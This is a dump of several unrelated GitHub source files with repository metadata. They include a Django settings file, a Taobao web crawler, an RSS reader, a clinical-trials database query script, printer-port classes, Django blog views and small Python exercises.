'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nCORS_ORIGIN_ALLOW_ALL = True\n# CORS_ORIGIN_WHITELIST = (\n# 'http://localhost:8080',\n# 'http://127.0.0.1:8080',\n# 'http://192.168.1.45:8080',\n# )\n\n# CSRF_COOKIE_SECURE = True\n\nROOT_URLCONF = 'lemka_api.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [BASE_DIR / 'templates'],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'lemka_api.wsgi.application'\n\n# Database\n# https://docs.djangoproject.com/en/3.1/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': BASE_DIR / 'db.sqlite3',\n }\n}\n\n# Password validation\n# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n# Internationalization\n# https://docs.djangoproject.com/en/3.1/topics/i18n/\n\nLANGUAGE_CODE = 'fr-be'\n\nTIME_ZONE = 'Europe/Brussels'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = False\n\n# Custom User Model\nAUTH_USER_MODEL = 'lemka.User'\n\nREST_FRAMEWORK = {\n # 'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',\n # 'PAGE_SIZE': 10,\n 'DEFAULT_AUTHENTICATION_CLASSES': [\n # 'rest_framework.lemka.BasicAuthentication',\n # 'rest_framework.lemka.SessionAuthentication',\n 'rest_framework_simplejwt.authentication.JWTAuthentication',\n ],\n # 'DEFAULT_PERMISSION_CLASSES': [\n # 'rest_framework.permissions.IsAuthenticated',\n # 'lemka.permissions.OwnUserPermission'\n # ],\n 'DEFAULT_SCHEMA_CLASS': 'rest_framework.schemas.coreapi.AutoSchema'\n}\n\nSIMPLE_JWT = {\n 'ACCESS_TOKEN_LIFETIME': timedelta(hours=2),\n 'REFRESH_TOKEN_LIFETIME': timedelta(days=1),\n 'ROTATE_REFRESH_TOKENS': False,\n 'BLACKLIST_AFTER_ROTATION': True,\n 'UPDATE_LAST_LOGIN': True,\n\n 'ALGORITHM': 'HS256',\n 'SIGNING_KEY': SECRET_KEY,\n 'VERIFYING_KEY': None,\n 'AUDIENCE': None,\n 'ISSUER': None,\n\n 'AUTH_HEADER_TYPES': ('Bearer',),\n 'AUTH_HEADER_NAME': 'HTTP_AUTHORIZATION',\n 'USER_ID_FIELD': 'id',\n 'USER_ID_CLAIM': 'user_id',\n\n 'AUTH_TOKEN_CLASSES': ('rest_framework_simplejwt.tokens.AccessToken',),\n 'TOKEN_TYPE_CLAIM': 'token_type',\n\n 'JTI_CLAIM': 'jti',\n\n 'SLIDING_TOKEN_REFRESH_EXP_CLAIM': 'refresh_exp',\n 'SLIDING_TOKEN_LIFETIME': timedelta(minutes=5),\n 'SLIDING_TOKEN_REFRESH_LIFETIME': timedelta(days=1),\n}\n\n# Configure Django App for Heroku.\ndjango_heroku.settings(locals())\n\n# LOGIN_URL = 'rest_framework:login'\n# LOGOUT_URL = 'rest_framework:logout'\n# LOGIN_REDIRECT_URL = '/api/v1/'\n# LOGOUT_REDIRECT_URL = '/api/v1/'\n\nEMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'\nEMAIL_HOST = 'smtp.gmail.com'\nEMAIL_USE_TLS = True\nEMAIL_PORT = 587\nEMAIL_HOST_USER = config.get('EMAIL_HOST_USER')\nEMAIL_HOST_PASSWORD = config.get('EMAIL_HOST_PASSWORD')\nDEFAULT_FROM_EMAIL = 'Lemka - Atelier de couture'\nSOCIAL_SECRET = config.get('SOCIAL_SECRET')\nGOOGLE_CLIENT_ID = config.get('GOOGLE_CLIENT_ID')\nGOOGLE_CLIENT_SECRET = config.get('GOOGLE_CLIENT_SECRET')\nFRONTEND_URL = config.get('FRONTEND_URL')\nAPP_SCHEME = config.get('APP_SCHEME')\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/3.1/howto/static-files/\n\nUSE_S3 = config.get('USE_S3', 'False')\nif USE_S3 and USE_S3 == 'True':\n AWS_ACCESS_KEY_ID = config.get('AWS_ACCESS_KEY_ID')\n AWS_SECRET_ACCESS_KEY = config.get('AWS_SECRET_ACCESS_KEY')\n AWS_STORAGE_BUCKET_NAME = config.get('AWS_STORAGE_BUCKET_NAME')\n AWS_S3_CUSTOM_DOMAIN = '%s.s3.amazonaws.com' % AWS_STORAGE_BUCKET_NAME\n\n AWS_DEFAULT_ACL = None\n AWS_S3_OBJECT_PARAMETERS = {\n 'CacheControl': 'max-age=86400',\n }\n\n DEFAULT_FILE_STORAGE = 'lemka_api.storages.MediaStore'\nelse:\n STATIC_ROOT = os.path.join(BASE_DIR, 'static')\n\n MEDIA_ROOT = os.path.join(BASE_DIR, 'media')\n MEDIA_URL = '/media/'\n MEDIAFILES_DIRS = (\n os.path.join(BASE_DIR, 'media')\n )\n\nSTATIC_URL = '/static/'\nSTATICFILES_DIRS = (str(BASE_DIR.joinpath('static')),)\nSTATIC_ROOT = str(BASE_DIR.joinpath('staticfiles'))\nSTATICFILES_STORAGE = 'django.contrib.staticfiles.storage.StaticFilesStorage'\n\n# MEDIA_URL = '/media/'\n# MEDIA_ROOT = 'media'\n","repo_name":"samadh90/lemka_api","sub_path":"lemka_api/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":6753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74011945194","text":"from Settings import HEADERS\nimport requests\nfrom data_cleaning.Extractor import Extractor\nfrom data_cleaning.content_clean import clean_content\nimport time\n\nif __name__ == '__main__':\n with open('C:/Users/叫乌鸦的少年怪/Desktop/his.txt', 'r', encoding='utf-8') as txt:\n url_list = txt.readlines()\n\n for i in range(len(url_list)):\n url = \"https://\" + url_list[i][:-1]\n try:\n response = requests.get(url, headers=HEADERS)\n html = response.text\n ex = Extractor(threshold=30)\n content = ex.filter_tags(html)\n data = clean_content(ex.getText(content))\n with open(f\"E:/c++/毕业设计开发日志/06.文本数据集/网购/淘宝/{i}.txt\", 'w+', encoding='utf-8') as file:\n file.write(data)\n print(f\"第{i+1}个淘宝网页爬取成功\")\n time.sleep(3)\n response.close()\n except Exception as e:\n print(e)\n","repo_name":"ulyyyyyy/GraduationProject_ghh","sub_path":"web_data_crawler/taobao_crawler.py","file_name":"taobao_crawler.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"1742037747","text":"import feedparser\n\ndef getFeed(url):\n feed = feedparser.parse(url)\n res = []\n for it in feed['items']:\n res.append((it[\"title\"],it[\"summary\"],it[\"link\"]))\n return res\n\ndef showFeed(feed):\n res=\"\"\n for t,s,l in feed:\n t = t.replace('\\n','')\n s = s.replace('\\n','')\n l = l.replace('\\n','')\n t = t.replace('

','')\n s = s.replace('

','')\n l = l.replace('

','')\n t = t.replace('

','')\n s = s.replace('

','')\n l = l.replace('

','')\n res=res+t+\"\\n\"+s+\"\\n\"+l+\"\\n\\n\"\n return res \n\ndef rssF3():\n url = \"https://france3-regions.francetvinfo.fr/grand-est/actu/rss\"\n feed = getFeed(url)\n return showFeed(feed)\n\ndef rssZDnet():\n url = \"https://www.zdnet.com/news/rss.xml\"\n feed = getFeed(url)\n return showFeed(feed)\n\n","repo_name":"cerisara/tasklab","sub_path":"oneapp4all/rss.py","file_name":"rss.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"26844762666","text":"import psycopg2\nimport pandas as pd\n\n#Dl AACT db here :https://aact.ctti-clinicaltrials.org/snapshots\n#install Postgres\n\n# Data exploration. (Path to relevant files in the DB)\n\n#Clinical trials analysis\n\n#Source ctgov.studies.source\n\n#Title ctgov.studies.official_tittle /brief_tittle\n\n#Indication ctgov.conditions.name (keys : nct_id; id)\n\n#Objectives Primary/secondary/ Endpoint outcome ctgov.outcomes.outcome_type\n\n#Number previous of studies/ results of previous phases ??\n\n#Study protocol ctgov.detailed_descriptions\n\n#Analysis plan to evaluate the endpoints (Intention to treat?) ctgov.outcomes.population (Intent-to-treat)\n\n#Hypothesis tested H0 ????\n\n#Clinical outcome of interest ctgov.outcomes.outcome_type/title/desciption\n\n#METHODS:\n\n#- Name of the method ctgov.outcome_analyses.method\n\n#- Type of studies (random/blind x2+) ctgov.studies.phase\n\n#- Number of participant ctgov.studies.enrollement\n\n#- Interventions (type of drugs given) ctgov.interventions.intervention_type/name/description/// ctgov.design_groups.title/description/timeframe (id; nct_id)\n\n#- Evaluation method ctgov.outcome_analyses.method (t_test, ancova)/ method_description/ groups_description (Week 8 etc.)\n\n#- Parameters ctgov.outcome_analyses.param_type / param_value / p_value/ p_value_description/ ci_n_sides/ ci_percent/ ci_lower_limit/ ci_upper_limit/\n\n#Baseline values ctgov.baseline_measurements.title/ units/ param_value\n\n#Delta to placebo (control group) ????\n\n#Primary/Sec Endpoint outcome ctgov.outcomes.outcome_type/ title/ description/ time_frame/ population\n\n#Group selection ????\n\n#Previous papers ????\n\n#Authors rep ????\n\n#Sponsor/author conflict of interest ????\n\nhostname = 'localhost'\ndatabase = 'aact'\nusername = 'postgres'\npwd = '*******'\nport_id = 5432\nconn = None\ncur= None\n\ntry:\n conn = psycopg2.connect(dbname=database, user= username, password= pwd, host=hostname, port= port_id)\n cur = conn.cursor()\n \n dfdes = pd.read_sql_query(\"select * from ctgov.designs where ctgov.designs.allocation ='Randomized' and ctgov.designs.primary_purpose = 'Treatment' and ctgov.designs.masking = 'Quadruple'or ctgov.designs.masking = 'Triple' or ctgov.designs.masking = 'Double'\", con=conn)\n #print(dfdes)\n #print(dfdesc['intervention_model_description'].value_counts())\n \n dfphase = pd.read_sql_query(\"SELECT * FROM ctgov.studies where ctgov.studies.phase = 'Phase 3' and ctgov.studies.is_fda_regulated_drug = False;\", con=conn )\n #print(dfphase)\n dfoutcome = pd.read_sql_query(\"select * from ctgov.outcome_analyses\", con=conn)\n #print(dfoutcome)\n #print(dfoutcome['method'].value_counts())\n \n dfjoin_des_out =pd.read_sql_query(\"select * from ctgov.outcome_analyses where nct_id in (select ctgov.designs.nct_id from ctgov.designs where ctgov.designs.allocation ='Randomized' and ctgov.designs.primary_purpose = 'Treatment' and ctgov.designs.masking = 'Quadruple'or ctgov.designs.masking = 'Triple' or ctgov.designs.masking = 'Double');\", con=conn)\n #print(dfjoin_des_out)\n query= \"create table ctgov.join as select * from ctgov.studies inner join ctgov.outcome_analyses using (nct_id);\"\n dfj = pd.read_sql_query(query, con=conn)\n \n \n conn.close()\n cur.close()\nfinally:\n if conn is not None :\n conn.close()\n if cur is not None :\n cur.close()\n\n","repo_name":"Git0BF/Ctrials","sub_path":"Ctrials.py","file_name":"Ctrials.py","file_ext":"py","file_size_in_byte":3323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40690394419","text":"import logging\nimport logging.handlers\nfrom logging import DEBUG,INFO,WARNING,ERROR,CRITICAL\n\n\nLOGFILE = 'runtime.log'\n\n_logrotate = logging.handlers.RotatingFileHandler(\n LOGFILE, backupCount=2, delay=True)\n_logrotate.setFormatter(\n logging.Formatter(\n '%(asctime)s %(levelname)-4.4s %(name)-20s: %(message)s'))\n# Force a log rotation each time we start up\n_logrotate.doRollover()\n\ndef getLogger(name):\n logger = logging.getLogger(name)\n logger.addHandler(_logrotate)\n\n logger.setLevel(DEBUG)\n\n return logger\n\n","repo_name":"Kromey/roglick","sub_path":"roglick/logging.py","file_name":"logging.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"17908606970","text":"from wpi.port import TCPIPPort, RAW, LPR, LocalPort\n\n\nclass ParameterError(Exception):\n pass\n\n\nclass RAWPort(TCPIPPort):\n def __init__(self, address, port=None, name=None, enable_snmp=False, snmp_dev_index=None, snmp_comunity=None):\n super().__init__()\n\n self.protocol = RAW\n self.address = address\n self.port = port or 9100\n\n self.__dict__['name'] = '{}:{}'.format(name or address, str(self.port))\n\n self.enable_snmp = enable_snmp\n self.snmp_dev_index = snmp_dev_index\n self.snmp_comunity = snmp_comunity\n\n\nclass LPRPort(TCPIPPort):\n def __init__(self, address, port=None, name=None, enable_snmp=False, snmp_dev_index=None, snmp_comunity=None,\n queue_name=None, is_enable_byte_count=False):\n super().__init__()\n\n self.protocol = LPR\n self.address = address\n self.port = port or 515\n\n self.__dict__['name'] = '{}:{}'.format(name or address, str(self.port))\n\n self.enable_snmp = enable_snmp\n self.snmp_dev_index = snmp_dev_index\n self.snmp_comunity = snmp_comunity\n\n self.queue_name = queue_name\n self.is_enable_byte_count = is_enable_byte_count\n\n\nclass SMBPort(LocalPort):\n def __init__(self, name):\n super().__init__(None)\n self.name = name\n\n\nclass Driver:\n def __init__(self, name, archive=None, inf_in_archive=None, inf_path=None):\n if bool(archive) and bool(inf_path):\n raise ParameterError\n\n self.name = name\n self.archive = archive\n self.inf_in_archive = inf_in_archive\n self.inf_path = inf_path\n\n\nclass Printer:\n def __init__(self, port, driver, name=None):\n self.port = port\n self.driver = driver\n self.name = name or driver\n\n\ndef ep(address, driver, name=None, protocol=None, ipport=None, archive=None, inf=None):\n\n if address.startswith('\\\\\\\\'):\n port = SMBPort(address)\n\n else:\n if protocol == RAW:\n port = RAWPort(address, ipport)\n elif protocol == LPR:\n port = LPRPort(address, ipport)\n\n elif protocol is None:\n\n if ipport is None:\n port = RAWPort(address)\n elif ipport >= 9100:\n port = RAWPort(address, ipport)\n else:\n port = LPRPort(address, ipport)\n\n else:\n raise ParameterError\n\n if archive:\n driver_obj = Driver(driver, archive, inf_in_archive=inf)\n else:\n driver_obj = Driver(driver, inf_path=inf)\n\n return Printer(port, driver_obj, name)\n","repo_name":"proganalysis/python3_types","sub_path":"Result/4079files/source_2/1420.py","file_name":"1420.py","file_ext":"py","file_size_in_byte":2575,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"23304235776","text":"import math\r\nfrom time import sleep\r\n\r\nfrom behave import given, then, use_step_matcher, step\r\nimport sys\r\n\r\nfrom functions.support_functions.webdriver_actions import by_css\r\nfrom functions.support_functions.support import factorialtest\r\n\r\nuse_step_matcher(\"re\")\r\n\r\n\r\n@given(\"UI: I am on factorial calculator page\")\r\ndef check_login_page(context):\r\n try:\r\n context.browser.get('https://cameramatics.pythonanywhere.com/')\r\n sleep(10)\r\n title_text = context.browser.title()\r\n if \"Factorial\" == title_text:\r\n pass\r\n else:\r\n sys.exit(1)\r\n except Exception as e:\r\n context.exc = e\r\n\r\n\r\n@given(u'UI: Input an integer 5')\r\ndef step_impl(context):\r\n text_input_field = by_css(context, 'input#number')\r\n text_input_field.click()\r\n text_input_field.clear()\r\n text_input_field.send_keys('5')\r\n sleep(5)\r\n\r\n\r\n@given(u'UI: Click Calculate')\r\ndef click_calculate(context):\r\n button_calculate = by_css(context, 'button#getFactorial')\r\n button_calculate.click()\r\n sleep(5)\r\n\r\n\r\n@step('Verify the factorial of (?P.+) is (?P.+)')\r\ndef verify_result(context, value, result):\r\n ui_result = by_css(context, 'p#resultDiv')\r\n factorial_value = factorialtest(value)\r\n\r\n assert result in ui_result.text\r\n assert str(factorial_value) in ui_result.text\r\n\r\n\r\n","repo_name":"luckyvasul21/cameramatics-repo","sub_path":"features/steps/try.py","file_name":"try.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4226489555","text":"Planet_name = ['Mercury', 'Venus', 'Earth', 'Mars',\n 'Jupiter', 'Saturn', 'Uranus', 'Neptune']\n\nprint(Planet_name)\n\nPlanet_inp = input(\"Please enter a planets name \")\n\nif Planet_inp in Planet_name[0:2]:\n print(\"You're in the inner planet.\")\n\nelif Planet_inp == Planet_name[2]:\n print(\"You're on Planet Earth.\")\n\nelse:\n print(\"You're in the outer planet\")\n","repo_name":"Tushargohel/Assignment_py","sub_path":"Assignment2/P6_A2.py","file_name":"P6_A2.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27588413349","text":"import pandas as pd\nimport csv\n\n# read and import all csv files using pandas\nyearlystats = pd.read_csv(\"yearlydata/2019.csv\")\nweeks = [\"weeklydata/2019/week1.csv\", \"weeklydata/2019/week2.csv\", \"weeklydata/2019/week3.csv\", \"weeklydata/2019/week4.csv\", \"weeklydata/2019/week5.csv\", \"weeklydata/2019/week6.csv\", \"weeklydata/2019/week7.csv\", \"weeklydata/2019/week8.csv\", \"weeklydata/2019/week9.csv\", \"weeklydata/2019/week10.csv\", \"weeklydata/2019/week11.csv\", \"weeklydata/2019/week12.csv\", \"weeklydata/2019/week13.csv\", \"weeklydata/2019/week14.csv\", \"weeklydata/2019/week15.csv\", \"weeklydata/2019/week16.csv\", \"weeklydata/2019/week17.csv\"]\n\nplayerprofiles = []\n\n# iterate through every player that scored that year\nfor i in range(len(yearlystats)): \n # pull player name and yearly average from that file\n playername = yearlystats[\"Player Name\"][i]\n gamesplayed = yearlystats[\"Games Played\"][i]\n yearlyaverage = yearlystats[\"Average Fantasy Points\"][i]\n\n profile = [playername]\n\n xdata = []\n ydata = []\n\n # iterate through every weekly data file to find weeks where the selected player scored points\n for file in range(len(weeks)):\n with open(weeks[file], \"r\") as f:\n weeklystats = pd.read_csv(f)\n\n # calculate their +/- from their yearly average and pull the opposing team's rank\n for k in range(len(weeklystats)):\n if playername == weeklystats[\"Player Name\"][k]:\n points = (weeklystats[\"Total Fantasy Points\"][k]) - yearlyaverage\n oppteam = weeklystats[\"Opposing Team Rank\"][k]\n\n xdata.append(oppteam)\n ydata.append(points)\n\n profile.append(round(points, 2))\n profile.append(oppteam)\n \n # find the correlation between opposing team rank and fantasy +/-\n x = pd.Series(xdata)\n y = pd.Series(ydata)\n correlation = x.corr(y)\n\n profile.insert(1, gamesplayed)\n profile.insert(2, round(correlation, 2))\n playerprofiles.append(profile)\n\n # create new file with the correlation coefficient and the data from all the games they played (game number does not mean week number)\n with open(\"correlations/2019correlations.csv\", \"w\") as f:\n writer = csv.writer(f)\n\n headers = [\"Player Name\", \"Games Played\", \"Correlation\", \"G1P\", \"G1DR\", \"G2P\", \"G2DR\", \"G3P\", \"G3DR\", \"G4P\", \"G4DR\", \"G5P\", \"G5DR\", \"G6P\", \"G6DR\", \"G7P\", \"G7DR\", \"G8P\", \"G8DR\", \"G9P\", \"G9DR\", \"G10P\", \"G10DR\", \"G11P\", \"G11DR\", \"G12P\", \"G12DR\", \"G13P\", \"G13DR\", \"G14P\", \"G14DR\", \"G15P\", \"G15DR\", \"G16P\", \"G16DR\", \"G17P\", \"G17DR\"]\n writer.writerow(headers)\n writer.writerows(playerprofiles)","repo_name":"dketter24/fantasy-football","sub_path":"correlations.py","file_name":"correlations.py","file_ext":"py","file_size_in_byte":2545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"73703057832","text":"from pathlib import Path\nfrom typing import Optional, Union\n\nfrom pytorch_lightning import LightningDataModule\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms\nfrom torchvision.datasets import MNIST\nfrom torchvision.transforms.transforms import Lambda\n\n\nclass MyDataModule(LightningDataModule):\n def __init__(\n self,\n *,\n image_size: int,\n batch_size: int,\n num_workers: int,\n data_dir: Union[str, Path] = 'data',\n pin_memory: bool = True,\n **_\n ):\n super().__init__()\n\n self.data_dir = data_dir if isinstance(data_dir, Path) else Path(data_dir)\n self.batch_size = batch_size\n self.num_workers = num_workers\n self.pin_memory = pin_memory\n\n self.transform = transforms.Compose(\n [\n transforms.Resize(image_size),\n transforms.ToTensor(),\n transforms.Lambda(lambda x: x[0:1]),\n # transforms.Normalize(0.5, 0.5),\n ]\n )\n return\n\n @property\n def num_classes(self) -> int:\n return 10\n\n @property\n def channels(self) -> int:\n return 1\n\n def prepare_data(self) -> None:\n \"\"\"Download data if needed. This method is called only from a single GPU.\n Do not use it to assign state (self.x = y).\"\"\"\n MNIST(\n root=str(self.data_dir / ''),\n train=False,\n download=True,\n transform=self.transform,\n )\n MNIST(\n root=str(self.data_dir / ''),\n train=False,\n download=True,\n transform=self.transform,\n )\n return\n\n def setup(self, stage: Optional[str] = None) -> None:\n assert stage is None or stage in ['fit', 'test'], stage\n self.data_train = MNIST(\n str(self.data_dir), train=True, transform=self.transform\n )\n self.data_val = MNIST(str(self.data_dir), train=False, transform=self.transform)\n return\n\n def train_dataloader(self):\n dataloader = DataLoader(\n dataset=self.data_train,\n batch_size=self.batch_size,\n num_workers=self.num_workers,\n pin_memory=self.pin_memory,\n shuffle=True,\n drop_last=True,\n )\n return dataloader\n\n def val_dataloader(self):\n dataloader = DataLoader(\n dataset=self.data_val,\n batch_size=self.batch_size,\n num_workers=self.num_workers,\n pin_memory=self.pin_memory,\n shuffle=False,\n )\n return dataloader\n\n # def test_dataloader(self):\n # return DataLoader(\n # dataset=self.data_test,\n # batch_size=self.batch_size,\n # num_workers=self.num_workers,\n # pin_memory=self.pin_memory,\n # shuffle=False,\n # )\n\n\nif __name__ == '__main__':\n\n image_size = 32\n batch_size = 64\n num_workers = 4\n\n datamodule = MyDataModule(\n image_size=image_size,\n batch_size=batch_size,\n num_workers=num_workers,\n )\n\n datamodule.prepare_data()\n datamodule.setup()\n","repo_name":"Kkun84/VAE_MNIST","sub_path":"lightning_module/data_module.py","file_name":"data_module.py","file_ext":"py","file_size_in_byte":3167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28947573416","text":"import random\n# import pandas\n\nlist_numbers = [1, 3, 5, 6, 78, 3, 5, 55]\nnew_list = [n + 10 for n in list_numbers]\n# print(new_list)\n\nnames = \"Shashi\"\nnew_names = [(name, f\"{name}name\") for name in names]\n# print(new_names)\n\nnew_range_value = [item * 2 for item in range(1, 5)]\n# print(new_range_value)\n\nlist_of_random_numbers = [random.randint(1, 100) for number in range(1, 10)]\n# print(list_of_random_numbers)\n\nprime_numbers = [prime_number for prime_number in list_of_random_numbers if prime_number % 2 == 0]\n# print(prime_numbers)\n\n# file_one_data = pandas.read_csv('file1.txt')\n# print(file_one_data)\n\nstripped_numbers = []\nstripped_numbers_two = []\nwith open('file1.txt', 'r') as file_one:\n list_numbers = file_one.readlines()\n for item in list_numbers:\n stripped_numbers.append(int(item.strip()))\n\nwith open('file2.txt', 'r') as file_two:\n numbers = file_two.readlines()\n for item in numbers:\n stripped_numbers_two.append(int(item.strip()))\n\n\nprint(len(stripped_numbers), len(stripped_numbers_two))\n\n# for index, item in enumerate(stripped_numbers):\n# if item in stripped_numbers_two:\n# common_items.append(item)\n\ncommon_items = [item for item in stripped_numbers if item in stripped_numbers_two]\n\nprint(common_items)\n","repo_name":"shashidev091/learnToRockPython","sub_path":"reLearning/Inremediate_python/list_comprehension.py","file_name":"list_comprehension.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"929660437","text":"from odoo import _, fields, models\n\n\nclass DocumentType(models.Model):\n\n _name = \"tmc.document_type\"\n _description = \"Document Type\"\n\n name = fields.Char(string=\"Document Type\")\n\n abbreviation = fields.Char(required=True)\n\n model = fields.Char(required=True)\n\n _sql_constraints = [\n (\n \"name_unique\",\n \"UNIQUE(name)\",\n _(\"Document type name must be unique\"),\n ),\n (\n \"abbreviation_unique\",\n \"UNIQUE(abbreviation)\",\n _(\"Document type abbreviation must be unique\"),\n ),\n ]\n","repo_name":"tmcrosario/odoo-tmc","sub_path":"tmc/models/document_type.py","file_name":"document_type.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"26575340432","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render,get_object_or_404,redirect\nfrom .models import BlogPost,BlogComment,BlogStats\nfrom django.core.paginator import Paginator\nfrom services.models import BlogPost as fbp\nfrom cart.models import session\nfrom django.db import IntegrityError\n\n################# DETAIL Blog##############\n\ndef Blog_Post_Detail_Page(request,post_id):\n obj = get_object_or_404(BlogPost, id=post_id)\n com_obj = BlogComment.objects.filter(Blog=obj)\n paginator = Paginator(com_obj, 5)\n page = request.GET.get('page')\n comments = paginator.get_page(page)\n template_name='services-detail.html'\n ## view ###\n if not request.user.is_anonymous:\n query_visit=BlogStats.objects.filter(blog=obj,user=request.user)\n if query_visit.count()==0:\n obj.views+=1\n obj.save()\n BlogStats(blog=obj,user=request.user,views=1).save()\n context={\"Blog\":obj,\"title\":\"Detail\",\"comments\":comments}\n return render(request,template_name,context)\n\n################# CREATE BLOG ##############\n@login_required(login_url='/login/accounts/login')\ndef Blog_Post_Create_Page(request):\n if request.POST or request.FILES:\n title = request.POST.get('title')\n content = request.POST.get('content')\n pr = request.POST.get('priority')\n if request.FILES:\n image = request.FILES['image']\n # save ima\n # s3.upload_file(image.read(), BUCKET, image.name)\n # fs = FileSystemStorage()\n # mi = fs.save(image.name, image)\n BlogPost(title=title,priority=pr,content=content,images=image,user=request.user).save()\n else:\n BlogPost(user=request.user,title=title,priority=pr,content=content).save()\n return redirect('/services/')\n template_name=\"create.html\"\n context = {}\n return render(request,template_name,context)\n\n################# LIST BLOG ################\n\ndef Blog_Post_List_Page(request):\n objs = BlogPost.objects.order_by('posted_time')[::-1]\n paginator = Paginator(objs, 5)\n template_name=\"services.html\"\n page = request.GET.get('page')\n blogs = paginator.get_page(page)\n context = {\"objects\":blogs}\n return render(request,template_name,context)\n\n############## New Comment ##########\n@login_required(login_url='/login/accounts/login')\ndef Create_Comment(request,post_id):\n if request.POST:\n newComment = BlogComment(user = request.user, Comment = request.POST['comment'],\n Blog_id=post_id)\n newComment.save()\n return redirect(\"/services/\"+post_id+\"/\")\n template_name = \"blog/create_comment.html\"\n context={}\n return render(request,template_name,context)\n\n############### Edit Comment #########\n@login_required(login_url='/login/accounts/login')\ndef Edit_Comment(request,comment_id):\n comment = get_object_or_404(BlogComment,id= comment_id)\n blog = comment.Blog\n if request.POST:\n comment.Comment = request.POST[\"edited_comment\"]\n comment.save()\n return redirect(\"/services/\"+str(blog.slug)+\"/\")\n template_name = \"blog/edit_comment.html\"\n context = {\"comment_to_edit\":comment.Comment}\n return render(request,template_name,context)\n\n############## Comment Delete ###############\n@login_required(login_url='/login/accounts/login')\ndef Delete_Comment(request,comment_id):\n comment = get_object_or_404(BlogComment,id= comment_id)\n blog = comment.Blog\n if request.POST:\n comment.delete()\n return redirect(\"/services/\"+str(blog.slug)+\"/\")\n template_name = \"blog/delete_comment.html\"\n return render(request,template_name)\n\n\n############# BLOG UPVOTE ###############\n@login_required(login_url='/login/accounts/login')\ndef Blog_Like(request,post_id):\n from_blog=get_object_or_404(BlogPost,id=post_id)\n a=get_object_or_404(BlogStats,blog=from_blog,user=request.user)\n if a.rating==1:\n from_blog.votes -=1\n from_blog.save()\n a.rating =0\n a.save()\n elif a.rating==0:\n from_blog.votes +=1\n from_blog.save()\n a.rating =1\n a.save()\n return redirect(\"/services/\"+str(from_blog.id)+\"/\")\n\n\n############# Donate ############\n@login_required(login_url='/login/accounts/login')\ndef Donate(request):\n template = \"blog/donate.html\"\n prev=0\n if request.POST:\n try:\n a=fbp.objects.create(title=\"donate\")\n session.objects.create(user=request.user, name=a,rate=request.POST.get(\"money\"))\n return redirect(\"/cart/\")\n except IntegrityError:\n a=fbp.objects.get(title=\"donate\")\n prev=a.value\n a.delete()\n a=fbp.objects.create(title=\"donate\")\n session.objects.create(user=request.user, name=a,rate=request.POST.get(\"money\"))\n return redirect(\"/cart/\")\n context = {\"pre_val\":prev}\n return render(request,template,context)","repo_name":"power88w/helpdesk","sub_path":"services/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4982,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14635928845","text":"import itertools\n\ndef detect_ranges(L):\n cL = L.copy()\n cL.sort()\n def aux(L):\n for i, j in itertools.groupby(enumerate(L), lambda x: x[1] - x[0]):\n j = list(j)\n start = j[0][1]\n length = len(j)\n\n if length == 1:\n yield start\n else:\n yield (start, start+length)\n return list(aux(cL))\n\ndef main():\n L = [4, 2, 0, -2, -4]\n print(L)\n result = detect_ranges(L)\n print(result)\n\n\n\nif __name__ == \"__main__\":\n 